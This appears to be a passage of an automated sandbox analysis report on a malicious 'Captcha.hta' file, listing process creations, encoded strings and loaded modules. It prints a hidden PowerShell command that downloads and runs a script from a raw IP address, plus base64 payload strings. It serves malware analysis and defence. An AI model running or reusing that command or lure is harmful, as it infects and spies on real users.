              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00419C107_2_00419C10
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00418C1E7_2_00418C1E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0041D4207_2_0041D420
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0041DC207_2_0041DC20
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004364307_2_00436430
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0043CCE07_2_0043CCE0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00422CF87_2_00422CF8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00427C9D7_2_00427C9D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0043CD607_2_0043CD60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004165717_2_00416571
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00424D707_2_00424D70
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00423D307_2_00423D30
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0041DE407_2_0041DE40
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00423E4B7_2_00423E4B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004126707_2_00412670
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004256707_2_00425670
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0041AE007_2_0041AE00
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0043CE007_2_0043CE00
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00423E307_2_00423E30
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004156D07_2_004156D0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00415EE07_2_00415EE0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004266E77_2_004266E7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004066907_2_00406690
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004366907_2_00436690
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00416E977_2_00416E97
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00402EA07_2_00402EA0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004376B07_2_004376B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00426EBE7_2_00426EBE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00428F5D7_2_00428F5D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0042B7637_2_0042B763
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00425F7D7_2_00425F7D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00414F087_2_00414F08
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004207177_2_00420717
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004187317_2_00418731
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0041EF307_2_0041EF30
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004167A57_2_004167A5
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00418FAD7_2_00418FAD
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0043DFB07_2_0043DFB0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00414A30 appears 76 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00408000 appears 52 times
              Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
              Source: Process Memory Space: powershell.exe PID: 3616, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: 1.2.powershell.exe.55e2b80.2.raw.unpack, Pls.csBase64 encoded string: 'QzpcXFdpbmRvd3NcXE1pY3Jvc29mdC5ORVRcXEZyYW1ld29ya1xcdjQuMC4zMDMxOVxcUmVnQXNtLmV4ZQ=='
              Source: 1.2.powershell.exe.55e2b80.2.raw.unpack, Sap.csBase64 encoded string: 'RjBVY2FBVVdNVThSRmxNWVBXODhGMFVMREZGVlZSdEZGbE1QVEhJY1p3VllEVVVXQzFVR1BXODhGMFVMREZGVlZSdEZGbE1QVEdRQWFCWmZEMU5NSzFnQll4QlpFbVVIRUVBY1pRZEZXVHRvYnp3RmN3QmFDMVZDQVZvVWRSRVdKMWdGQzFnUVl4QkZiendaYnp4VkprSVdRVVFIQlY4YWFFSjFEVmdVQjBRR2J3MVlMMU1XQ2xrUmRXODhRaFpDUWtZQVpBNWZBUllSRmxjQmJ3RVdLMWdXVXdCVlJRMVlGRk1RRm1JYVR3eENVd0JLQUU4Qll6bHJRa0FERGtNUUtrSmZERUpDRVVJVWRCWi9ERklIR2g5NERFSVdRaFlaYnp4VkprSVdRaFpDUWtRUWNoZEVEQllnQzBJMmFReEFCMFFXQjBSYlVnMS9ERUpUVkI0RFp3NURCeHBDRVVJVWRCWi9ERklIR2g5T0MyZ1dRaFpDSHp0L0MyZ1dRaFpDRWtNWGFndFZRa1VXQTBJY1pVSi9ERUpSVUJZMmFReEFCMFFXTmxrOGFCWUZVQjRBRzBJUVhUOFdGRmNPRjFOWkpndFlGaFlSRmxjSGNpdFlCbE1hU3p0L0prSVdRazF2YUJaVkprSVdRaFpDRUZNQmN4QllRblFMRm5VYWFCUlRFRUlIRUJnaGFTdFlGZ1ZRU2tBVWFoZFRUaFlSRmxjSGNpdFlCbE1hU3cxNERFSVdRaFlmYnp4NERFSVdRaFlTRjFRWmJ3RVdFVUlERmw4V0pnQlBGbE01UHhZMmFReEFCMFFXTmxrM2Z4WlRFUjRMREVKVmNBTmFGMU5MYnp4VkprSVdHVHRvUWhaVkprSVdRaFlRQjBJQWRBd1dJRjhXSVZrYmNBZEVGbE1RVEhFUWNpQlBGbE1SU2tBVWFoZFRTdzF2YUJaVkprSkxienhDUWhaVkpRZFlCa1FIQlY4YWFHODhienhDUWhaVkpSQlRCVjhOREJZMGRndDRBMXNIRVR0L0prSVdRa1lYQUZvY1pVSkZGbGNXQzFWVmRSWkVDMWdGT1d0VlFRZENJMFlMTEZjWVl4RWVTenRvUWhaVkpoazdhQlpDUWhaVkprSVdFRk1XRjBRYkpneFRGUllSRmtRY2FBVnRQenRvUWhaVkprSVdRaFlaYnp4VkprSVdRaFpDUWhaVkprSVVDVk1RREZNWk5WQVVUanRvUWhaVkprSVdRaFpDUWhaVkpBeENCbG9PUUJwNERFSVdRaFpDUWhaVkprSVdRaFF3QjBVQWF3ZGlDa1FIQTFKWEttODhRaFpDUWhaVkprSVdRaFpDUUdFYWNWUUNNVk1XTmw0SFl3TlNJVmtNRmxNTmNrQWFienhDUWhaVkprSVdRaFpDUWhaWFZRZENObDRRQjFjUlJRMVlGbE1hRmhSWkMyZ1dRaFpDUWhaVkprSVdRaFpBTlZrQ01GWnhCMEkyQ2tRUVp3WjFEVmdXQjA0QkpFNDdhQlpDUWhaVkprSVdRaFpDUWhReVl4WmlDa1FIQTFJMmFReENCMDRXUUJwNERFSVdRaFpDUWhaVkprSVdRaFEwQzBRQmN3TmFJMW9PRFZVd2ZrQWFienhDUWhaVkprSVdRaFpDUWhaWFVSQmZGbE15RUZrV1l4RkZMMU1QRFVRTUpFNDdhQlpDUWhaVkprSVdRaFpDUWhRbll3TlNNa1FOQVZNR2RTOVREMWtRR3hSWkMyZ1dRaFpDUWhaVkprSVdRaFpBT0VFZ2FBOVhFbUFMQjBFNllERlRBVUlMRFZoWEttODhRaFpDUWhaVkprSVdRaFpDUUhVSFl3TkNCMllRRFZVUWRSRjNRRHRvUWhaVkprSVdRaFlmV1R0L0prSVdRa3R2YUJaVkprSVZCMWdHRUZNU2J3MVlienh2YUJaVkprSVZFRk1GQzFrYkppTkdDM0lIRGxNU1p4WlRFVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVmJ3eENRbVFIRVVNWVl6WmVFRk1EQm5JUWFnZFJBMElIU244YmNqSkNFQllLQTFnUmFnY2ZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVlpBMVpEaFl4QjBJaWFSVUFWbUlLRUZNVVlpRlpERUlIR2tJeFl3NVRCVmNXQng0OGFCWm1Ga1JDRmw0SFl3TlNUaFlMREVJdVcwSlZEVmdXQjA0QkwxazdhQlpDUWhZRmRBdEFBMElIUWxJUWFnZFJBMElIUWxRYWFRNFdNVk1XTmw0SFl3TlNJVmtNRmxNTmNpWlREbE1GQTBJUUxpdFlGbVlXRUJZQmJoQlRBMUpPUWw4YmNqbHJRbFVOREVJUWZoWWZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVlpBMVpEaFlsQjBJaWFSVUFWbUlLRUZNVVlpRlpERUlIR2tJeFl3NVRCVmNXQng0OGFCWm1Ga1JDRmw0SFl3TlNUaFlMREVJdVcwSlZEVmdXQjA0QkwxazdhQlpDUWhZRmRBdEFBMElIUWxJUWFnZFJBMElIUWxRYWFRNFdKVk1XTmw0SFl3TlNJVmtNRmxNTmNpWlREbE1GQTBJUUxpdFlGbVlXRUJZQmJoQlRBMUpPUWw4YmNqbHJRbFVOREVJUWZoWWZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVmJ3eENRbUFMRUVJQVp3NTNEbG9OQVhNTlFnZGFCMUVERmxOZFR3eENNa0lRUWw0VWFBWmFCeHBDQzFnQkpnTlNCa1FIRVVWWkpndFlGaFlPQjFnU2Nnb2FRbDhNRmhZQmZ4SlRUaFlMREVKVmRoQlpGbE1CRmg5T0MyZ1dRaFpDRWtRY2NBTkNCeFlHQjFvUVlRTkNCeFlBRFZrWkpqVkVDMElITDFNWWFSQlBKbE1PQjFFVWNnY2VLMWdXTWtJSEp
              Source: 1.2.powershell.exe.55cc700.1.raw.unpack, Pls.csBase64 encoded string: 'QzpcXFdpbmRvd3NcXE1pY3Jvc29mdC5ORVRcXEZyYW1ld29ya1xcdjQuMC4zMDMxOVxcUmVnQXNtLmV4ZQ=='
              Source: 1.2.powershell.exe.55cc700.1.raw.unpack, Sap.csBase64 encoded string: 'RjBVY2FBVVdNVThSRmxNWVBXODhGMFVMREZGVlZSdEZGbE1QVEhJY1p3VllEVVVXQzFVR1BXODhGMFVMREZGVlZSdEZGbE1QVEdRQWFCWmZEMU5NSzFnQll4QlpFbVVIRUVBY1pRZEZXVHRvYnp3RmN3QmFDMVZDQVZvVWRSRVdKMWdGQzFnUVl4QkZiendaYnp4VkprSVdRVVFIQlY4YWFFSjFEVmdVQjBRR2J3MVlMMU1XQ2xrUmRXODhRaFpDUWtZQVpBNWZBUllSRmxjQmJ3RVdLMWdXVXdCVlJRMVlGRk1RRm1JYVR3eENVd0JLQUU4Qll6bHJRa0FERGtNUUtrSmZERUpDRVVJVWRCWi9ERklIR2g5NERFSVdRaFlaYnp4VkprSVdRaFpDUWtRUWNoZEVEQllnQzBJMmFReEFCMFFXQjBSYlVnMS9ERUpUVkI0RFp3NURCeHBDRVVJVWRCWi9ERklIR2g5T0MyZ1dRaFpDSHp0L0MyZ1dRaFpDRWtNWGFndFZRa1VXQTBJY1pVSi9ERUpSVUJZMmFReEFCMFFXTmxrOGFCWUZVQjRBRzBJUVhUOFdGRmNPRjFOWkpndFlGaFlSRmxjSGNpdFlCbE1hU3p0L0prSVdRazF2YUJaVkprSVdRaFpDRUZNQmN4QllRblFMRm5VYWFCUlRFRUlIRUJnaGFTdFlGZ1ZRU2tBVWFoZFRUaFlSRmxjSGNpdFlCbE1hU3cxNERFSVdRaFlmYnp4NERFSVdRaFlTRjFRWmJ3RVdFVUlERmw4V0pnQlBGbE01UHhZMmFReEFCMFFXTmxrM2Z4WlRFUjRMREVKVmNBTmFGMU5MYnp4VkprSVdHVHRvUWhaVkprSVdRaFlRQjBJQWRBd1dJRjhXSVZrYmNBZEVGbE1RVEhFUWNpQlBGbE1SU2tBVWFoZFRTdzF2YUJaVkprSkxienhDUWhaVkpRZFlCa1FIQlY4YWFHODhienhDUWhaVkpSQlRCVjhOREJZMGRndDRBMXNIRVR0L0prSVdRa1lYQUZvY1pVSkZGbGNXQzFWVmRSWkVDMWdGT1d0VlFRZENJMFlMTEZjWVl4RWVTenRvUWhaVkpoazdhQlpDUWhaVkprSVdFRk1XRjBRYkpneFRGUllSRmtRY2FBVnRQenRvUWhaVkprSVdRaFlaYnp4VkprSVdRaFpDUWhaVkprSVVDVk1RREZNWk5WQVVUanRvUWhaVkprSVdRaFpDUWhaVkpBeENCbG9PUUJwNERFSVdRaFpDUWhaVkprSVdRaFF3QjBVQWF3ZGlDa1FIQTFKWEttODhRaFpDUWhaVkprSVdRaFpDUUdFYWNWUUNNVk1XTmw0SFl3TlNJVmtNRmxNTmNrQWFienhDUWhaVkprSVdRaFpDUWhaWFZRZENObDRRQjFjUlJRMVlGbE1hRmhSWkMyZ1dRaFpDUWhaVkprSVdRaFpBTlZrQ01GWnhCMEkyQ2tRUVp3WjFEVmdXQjA0QkpFNDdhQlpDUWhaVkprSVdRaFpDUWhReVl4WmlDa1FIQTFJMmFReENCMDRXUUJwNERFSVdRaFpDUWhaVkprSVdRaFEwQzBRQmN3TmFJMW9PRFZVd2ZrQWFienhDUWhaVkprSVdRaFpDUWhaWFVSQmZGbE15RUZrV1l4RkZMMU1QRFVRTUpFNDdhQlpDUWhaVkprSVdRaFpDUWhRbll3TlNNa1FOQVZNR2RTOVREMWtRR3hSWkMyZ1dRaFpDUWhaVkprSVdRaFpBT0VFZ2FBOVhFbUFMQjBFNllERlRBVUlMRFZoWEttODhRaFpDUWhaVkprSVdRaFpDUUhVSFl3TkNCMllRRFZVUWRSRjNRRHRvUWhaVkprSVdRaFlmV1R0L0prSVdRa3R2YUJaVkprSVZCMWdHRUZNU2J3MVlienh2YUJaVkprSVZFRk1GQzFrYkppTkdDM0lIRGxNU1p4WlRFVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVmJ3eENRbVFIRVVNWVl6WmVFRk1EQm5JUWFnZFJBMElIU244YmNqSkNFQllLQTFnUmFnY2ZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVlpBMVpEaFl4QjBJaWFSVUFWbUlLRUZNVVlpRlpERUlIR2tJeFl3NVRCVmNXQng0OGFCWm1Ga1JDRmw0SFl3TlNUaFlMREVJdVcwSlZEVmdXQjA0QkwxazdhQlpDUWhZRmRBdEFBMElIUWxJUWFnZFJBMElIUWxRYWFRNFdNVk1XTmw0SFl3TlNJVmtNRmxNTmNpWlREbE1GQTBJUUxpdFlGbVlXRUJZQmJoQlRBMUpPUWw4YmNqbHJRbFVOREVJUWZoWWZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVlpBMVpEaFlsQjBJaWFSVUFWbUlLRUZNVVlpRlpERUlIR2tJeFl3NVRCVmNXQng0OGFCWm1Ga1JDRmw0SFl3TlNUaFlMREVJdVcwSlZEVmdXQjA0QkwxazdhQlpDUWhZRmRBdEFBMElIUWxJUWFnZFJBMElIUWxRYWFRNFdKVk1XTmw0SFl3TlNJVmtNRmxNTmNpWlREbE1GQTBJUUxpdFlGbVlXRUJZQmJoQlRBMUpPUWw4YmNqbHJRbFVOREVJUWZoWWZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVmJ3eENRbUFMRUVJQVp3NTNEbG9OQVhNTlFnZGFCMUVERmxOZFR3eENNa0lRUWw0VWFBWmFCeHBDQzFnQkpnTlNCa1FIRVVWWkpndFlGaFlPQjFnU2Nnb2FRbDhNRmhZQmZ4SlRUaFlMREVKVmRoQlpGbE1CRmg5T0MyZ1dRaFpDRWtRY2NBTkNCeFlHQjFvUVlRTkNCeFlBRFZrWkpqVkVDMElITDFNWWFSQlBKbE1PQjFFVWNnY2VLMWdXTWtJSEp
              Source: 1.2.powershell.exe.77d0000.4.raw.unpack, Pls.csBase64 encoded string: 'QzpcXFdpbmRvd3NcXE1pY3Jvc29mdC5ORVRcXEZyYW1ld29ya1xcdjQuMC4zMDMxOVxcUmVnQXNtLmV4ZQ=='
              Source: 1.2.powershell.exe.77d0000.4.raw.unpack, Sap.csBase64 encoded string: 'RjBVY2FBVVdNVThSRmxNWVBXODhGMFVMREZGVlZSdEZGbE1QVEhJY1p3VllEVVVXQzFVR1BXODhGMFVMREZGVlZSdEZGbE1QVEdRQWFCWmZEMU5NSzFnQll4QlpFbVVIRUVBY1pRZEZXVHRvYnp3RmN3QmFDMVZDQVZvVWRSRVdKMWdGQzFnUVl4QkZiendaYnp4VkprSVdRVVFIQlY4YWFFSjFEVmdVQjBRR2J3MVlMMU1XQ2xrUmRXODhRaFpDUWtZQVpBNWZBUllSRmxjQmJ3RVdLMWdXVXdCVlJRMVlGRk1RRm1JYVR3eENVd0JLQUU4Qll6bHJRa0FERGtNUUtrSmZERUpDRVVJVWRCWi9ERklIR2g5NERFSVdRaFlaYnp4VkprSVdRaFpDUWtRUWNoZEVEQllnQzBJMmFReEFCMFFXQjBSYlVnMS9ERUpUVkI0RFp3NURCeHBDRVVJVWRCWi9ERklIR2g5T0MyZ1dRaFpDSHp0L0MyZ1dRaFpDRWtNWGFndFZRa1VXQTBJY1pVSi9ERUpSVUJZMmFReEFCMFFXTmxrOGFCWUZVQjRBRzBJUVhUOFdGRmNPRjFOWkpndFlGaFlSRmxjSGNpdFlCbE1hU3p0L0prSVdRazF2YUJaVkprSVdRaFpDRUZNQmN4QllRblFMRm5VYWFCUlRFRUlIRUJnaGFTdFlGZ1ZRU2tBVWFoZFRUaFlSRmxjSGNpdFlCbE1hU3cxNERFSVdRaFlmYnp4NERFSVdRaFlTRjFRWmJ3RVdFVUlERmw4V0pnQlBGbE01UHhZMmFReEFCMFFXTmxrM2Z4WlRFUjRMREVKVmNBTmFGMU5MYnp4VkprSVdHVHRvUWhaVkprSVdRaFlRQjBJQWRBd1dJRjhXSVZrYmNBZEVGbE1RVEhFUWNpQlBGbE1SU2tBVWFoZFRTdzF2YUJaVkprSkxienhDUWhaVkpRZFlCa1FIQlY4YWFHODhienhDUWhaVkpSQlRCVjhOREJZMGRndDRBMXNIRVR0L0prSVdRa1lYQUZvY1pVSkZGbGNXQzFWVmRSWkVDMWdGT1d0VlFRZENJMFlMTEZjWVl4RWVTenRvUWhaVkpoazdhQlpDUWhaVkprSVdFRk1XRjBRYkpneFRGUllSRmtRY2FBVnRQenRvUWhaVkprSVdRaFlaYnp4VkprSVdRaFpDUWhaVkprSVVDVk1RREZNWk5WQVVUanRvUWhaVkprSVdRaFpDUWhaVkpBeENCbG9PUUJwNERFSVdRaFpDUWhaVkprSVdRaFF3QjBVQWF3ZGlDa1FIQTFKWEttODhRaFpDUWhaVkprSVdRaFpDUUdFYWNWUUNNVk1XTmw0SFl3TlNJVmtNRmxNTmNrQWFienhDUWhaVkprSVdRaFpDUWhaWFZRZENObDRRQjFjUlJRMVlGbE1hRmhSWkMyZ1dRaFpDUWhaVkprSVdRaFpBTlZrQ01GWnhCMEkyQ2tRUVp3WjFEVmdXQjA0QkpFNDdhQlpDUWhaVkprSVdRaFpDUWhReVl4WmlDa1FIQTFJMmFReENCMDRXUUJwNERFSVdRaFpDUWhaVkprSVdRaFEwQzBRQmN3TmFJMW9PRFZVd2ZrQWFienhDUWhaVkprSVdRaFpDUWhaWFVSQmZGbE15RUZrV1l4RkZMMU1QRFVRTUpFNDdhQlpDUWhaVkprSVdRaFpDUWhRbll3TlNNa1FOQVZNR2RTOVREMWtRR3hSWkMyZ1dRaFpDUWhaVkprSVdRaFpBT0VFZ2FBOVhFbUFMQjBFNllERlRBVUlMRFZoWEttODhRaFpDUWhaVkprSVdRaFpDUUhVSFl3TkNCMllRRFZVUWRSRjNRRHRvUWhaVkprSVdRaFlmV1R0L0prSVdRa3R2YUJaVkprSVZCMWdHRUZNU2J3MVlienh2YUJaVkprSVZFRk1GQzFrYkppTkdDM0lIRGxNU1p4WlRFVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVmJ3eENRbVFIRVVNWVl6WmVFRk1EQm5JUWFnZFJBMElIU244YmNqSkNFQllLQTFnUmFnY2ZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVlpBMVpEaFl4QjBJaWFSVUFWbUlLRUZNVVlpRlpERUlIR2tJeFl3NVRCVmNXQng0OGFCWm1Ga1JDRmw0SFl3TlNUaFlMREVJdVcwSlZEVmdXQjA0QkwxazdhQlpDUWhZRmRBdEFBMElIUWxJUWFnZFJBMElIUWxRYWFRNFdNVk1XTmw0SFl3TlNJVmtNRmxNTmNpWlREbE1GQTBJUUxpdFlGbVlXRUJZQmJoQlRBMUpPUWw4YmNqbHJRbFVOREVJUWZoWWZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVlpBMVpEaFlsQjBJaWFSVUFWbUlLRUZNVVlpRlpERUlIR2tJeFl3NVRCVmNXQng0OGFCWm1Ga1JDRmw0SFl3TlNUaFlMREVJdVcwSlZEVmdXQjA0QkwxazdhQlpDUWhZRmRBdEFBMElIUWxJUWFnZFJBMElIUWxRYWFRNFdKVk1XTmw0SFl3TlNJVmtNRmxNTmNpWlREbE1GQTBJUUxpdFlGbVlXRUJZQmJoQlRBMUpPUWw4YmNqbHJRbFVOREVJUWZoWWZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVmJ3eENRbUFMRUVJQVp3NTNEbG9OQVhNTlFnZGFCMUVERmxOZFR3eENNa0lRUWw0VWFBWmFCeHBDQzFnQkpnTlNCa1FIRVVWWkpndFlGaFlPQjFnU2Nnb2FRbDhNRmhZQmZ4SlRUaFlMREVKVmRoQlpGbE1CRmg5T0MyZ1dRaFpDRWtRY2NBTkNCeFlHQjFvUVlRTkNCeFlBRFZrWkpqVkVDMElITDFNWWFSQlBKbE1PQjFFVWNnY2VLMWdXTWtJSEp
              Source: classification engineClassification label: mal100.phis.troj.spyw.expl.evad.winHTA@13/18@5/4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00436F90 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,7_2_00436F90
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4548:120:WilError_03
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4ora4veg.tut.ps1Jump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: Captcha.htaReversingLabs: Detection: 13%
              Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\Captcha.hta"
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iwr -useb http://45.131.135.227/tbhy.ps1 | iex"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2pzvj5lc\2pzvj5lc.cmdline"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mvgjodmb\mvgjodmb.cmdline"
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3BAA.tmp" "c:\Users\user\AppData\Local\Temp\mvgjodmb\CSC1DCFE1A1CB594C5687CEBA7BEDB98DA4.TMP"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iwr -useb http://45.131.135.227/tbhy.ps1 | iex"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2pzvj5lc\2pzvj5lc.cmdline"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mvgjodmb\mvgjodmb.cmdline"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3BAA.tmp" "c:\Users\user\AppData\Local\Temp\mvgjodmb\CSC1DCFE1A1CB594C5687CEBA7BEDB98DA4.TMP"Jump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
